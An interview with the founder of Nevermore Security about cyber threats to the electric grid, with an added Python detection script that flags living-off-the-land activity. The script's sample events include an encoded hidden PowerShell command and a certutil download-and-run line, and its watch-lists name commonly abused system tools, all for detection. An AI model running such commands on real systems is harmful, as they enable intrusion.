Cybersecurity is a hot topic across national states and businesses. Annabelle Lee, Founder of Rockville based Nevermore Security, tells us more about combating cyber risks in the electric sector.

Nevermore Security specialise in providing cyber security strategy and guidance for the electric sector, identifying tools and techniques that utilities may deploy to identify high priority risks and threats. Founder, Annabelle Lee, discusses cybersecurity trends, challenges faced by the industry and how her innovative organisation identifies high profile risks, provides strategic solutions and ensures the reliability of the electric grid.  

What do you see as being the main cyber security trends impacting the electric sector today?

The highest-rated cybersecurity concerns are third-party risks, data breaches and attacks on Internet of Things (IoT) and Operational Technology (OT) assets. These types of security incidents are expected to increase in frequency.   

Malware also continues to loom as a primary feature of the threat landscape, but often only as the precursor to an attack, not the ultimate objective. Initial intrusion leads to more sophisticated and stealthy techniques using legitimate tools already present on the target system to accomplish adversary objectives. This approach is called “living off the land.” During early phases of attacks, threat agents increasingly use this methodology, leveraging native system commands, applications, and software to gain access to the system and move throughout the network undetected.

Malware-free attacks are a further attack technique, involving “fileless” exploits where no executable file is written to disk. These attacks are particularly effective at evading traditional antivirus solutions, which look for files saved to disk so they can scan them and determine if they are malicious. Exploits and exploit kits are used to execute attacks directly in memory by exploiting vulnerabilities within an operating system or installed applications, and stolen credentials are leveraged for remote logins using known tools. Attackers can then create user accounts that grant them at-will access to systems.
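As an added illustration (not code from the interview or from Nevermore Security), the following rules flag the patterns described above in endpoint telemetry: a native tool launched by a document-handling parent, an encoded or download-and-run command line, and account creation outside an approved provisioning identity. The event format, watch-lists and sample lines are constructed for the example.

```python
import re
from typing import Dict, List

# Constructed watch-lists (assumptions for this example): native Windows tools
# commonly abused "living off the land", and parents that rarely spawn them.
LOTL_BINARIES = {"powershell.exe", "certutil.exe", "mshta.exe", "rundll32.exe", "wmic.exe"}
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}
ENCODED_CMD = re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s")
DOWNLOAD_HINT = re.compile(r"(?i)(downloadstring|invoke-expression|\biex\b|urlcache)")
APPROVED_PROVISIONERS = {"svc_provisioning"}  # identities allowed to create accounts

def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed 'key=value | key=value' event line into a dict."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields

def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of the detection rules that fire for one event."""
    hits = []
    if event.get("type") == "process":
        image = event.get("image", "").lower()
        parent = event.get("parent", "").lower()
        cmd = event.get("cmd", "")
        if image in LOTL_BINARIES and parent in SUSPICIOUS_PARENTS:
            hits.append("lolbin_from_office_parent")  # document spawning a native tool
        if image in LOTL_BINARIES and ENCODED_CMD.search(cmd):
            hits.append("encoded_command_line")       # obfuscated script, nothing on disk
        if image in LOTL_BINARIES and DOWNLOAD_HINT.search(cmd):
            hits.append("download_cradle")            # fetch-and-run via a built-in tool
    elif event.get("type") == "account_created":
        # Attackers create accounts for at-will access; flag creations by anyone
        # outside the change-management allowlist.
        if event.get("actor", "").lower() not in APPROVED_PROVISIONERS:
            hits.append("unapproved_account_creation")
    return hits

SAMPLE_EVENTS = [  # constructed sample telemetry, not real logs
    "type=process | parent=explorer.exe | image=notepad.exe | cmd=notepad.exe report.txt",
    "type=process | parent=winword.exe | image=powershell.exe | cmd=powershell -nop -w hidden -enc SQBFAFgA",
    "type=process | parent=cmd.exe | image=certutil.exe | cmd=certutil -urlcache -split -f http://example.invalid/x x",
    "type=account_created | actor=svc_provisioning | account=jsmith",
    "type=account_created | actor=contractor01 | account=support_tmp",
]

def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Map each line index to the rules it triggers; lines with no hits are omitted."""
    return {i: hits for i, line in enumerate(lines) if (hits := evaluate(parse_event(line)))}

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx], "->", rules)
```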

Who are the primary threat agents?

Vulnerabilities are exploited by different threat actors. While there are many threat actors out there today, most of them fit into the following categories.

Government/State Sponsored: Well-funded, often sophisticated, targeted attacks, motivated by political, economic, technical, or military agendas. These often seek competitive information, resources or users who can be exploited.

Organised Crime: Targeted attacks seeking to acquire personal information such as social security numbers, health records and banking information or to hijack and ransom critical digital resources.

Hacktivists: Attacks arising from political agendas, aimed at creating high-profile attacks to promote propaganda or cause damage to organisations hacktivists oppose. 

Insider Threat: Typically disgruntled employees or ex-employees seeking revenge or financial gain, sometimes collaborating with other threat actors, such as organised crime or government sponsored hackers.

Opportunistic: Usually amateur criminals driven by the desire for notoriety. They find and expose flaws and exploits in network systems and devices.

Internal User Error: Users making mistakes with configurations owing to design flaws in the network or system, or by the provision of access to unauthorised users, which often results in the breakdown of firewalls, routers, and servers.

Why has cyber security become more critical in the electric sector?

Advancements in technology coupled with an increase in inter-system communications, including the internet, have provided significant benefits to utilities in terms of increased efficiency and lowered costs, yet these changes have led to a significant increase in the exposure of electric utilities and grids to cyber threats and risks.

The current power grid consists of both legacy and next generation technologies. New components operate in conjunction with legacy equipment which lacks cyber security controls. As networking technology has advanced and become more accessible, organisations have integrated systems. With the increase in the use of digital devices, more advanced communications and information technology, the overall attack surface has increased. 

Cyber security must address deliberate attacks launched by disgruntled employees and nation states as well as non-malicious cyber security events such as user errors. Since organisations, including utilities, have limited resources, cyber security must be prioritised with the other components of enterprise risk. Cyber security risk is one component of enterprise risk management, which addresses many types of risk (e.g., financial, mission, public perception). 

In addition to adequately addressing potential threats and vulnerabilities, cyber security must be included in all phases of the system development life cycle, from the design phase through implementation, operations and maintenance, and disposition/sunset. It must be constantly assessed and revised to address evolving threats, vulnerabilities, and security incidents.

Are there tools available for the electric sector to address cyber security?

There are several tools that are publicly available and there are techniques that utilities may use to address cyber security. 

One important approach is to develop a security architecture based on the enterprise architecture which identifies the attack surface and vectors. The more exposed the surface of the system, the greater potential for attack. As the IoT, Industrial Internet of Things (IIoT) and other new technologies proliferate, the attack surface and the number of attack vectors increase.

The basics of user awareness, asset and vulnerability management, and secure configurations continue to serve as the foundation for a strong cybersecurity programme. Organisations should regularly review and improve their standard security controls to include user awareness programmes, asset management and software inventory, vulnerability and patch management as well as multifactor authentication, which makes it difficult for adversaries to gain access.

What is unique about Nevermore Security’s offering to the sector?  

In-depth knowledge and specialist expertise gained throughout a continually changing technical environment. It is essential to understand the distinction of the cybersecurity needs in the electric sector and OT environment as compared to the IT environment, and Nevermore Security has experience in this field.

From a personal perspective, providing technical guidance to the North American Energy Standards Board (NAESB), and participating on the Security Advisory Committees for two US Department of Energy (DoE) laboratories, enables me to keep up to date with current and future cyber security research trends as well as associated potential threats. For the energy sector in particular, this is crucial. Its infrastructure is an extremely complex and critical one with many other industry sectors relying on it for their services. Nevermore Security’s contribution in addressing potential threats and vulnerabilities across entire system lifecycles with efficient strategies and solutions must reflect this.    

What do you feel will be the key emerging trends over the next decade, and how will your company aim to respond to them?

The continually changing threat and technology environments in the electric sector pose a significant challenge.

New technology is deployed with legacy devices. Older technology does not address cybersecurity, and it is not possible to “bolt on” cybersecurity. New technology systems must be interconnected, yet this increases the attack surface for malicious actors. The combination of new and legacy technology is a challenge for the electric sector that must ensure the reliability and resiliency of the grid. 

Finally, the new OT devices will have a lifetime of 20 to 30 years, unlike the IT devices that are updated in three to five years. This situation requires utilities to consider how to protect systems and devices against future attacks and vulnerabilities. Nevermore Security works with utilities to manage these risks, and we think we will be very busy over the coming years!

For further information relating to Nevermore Security’s cybersecurity offering, please visit: https://www.nevermoresecurity.com/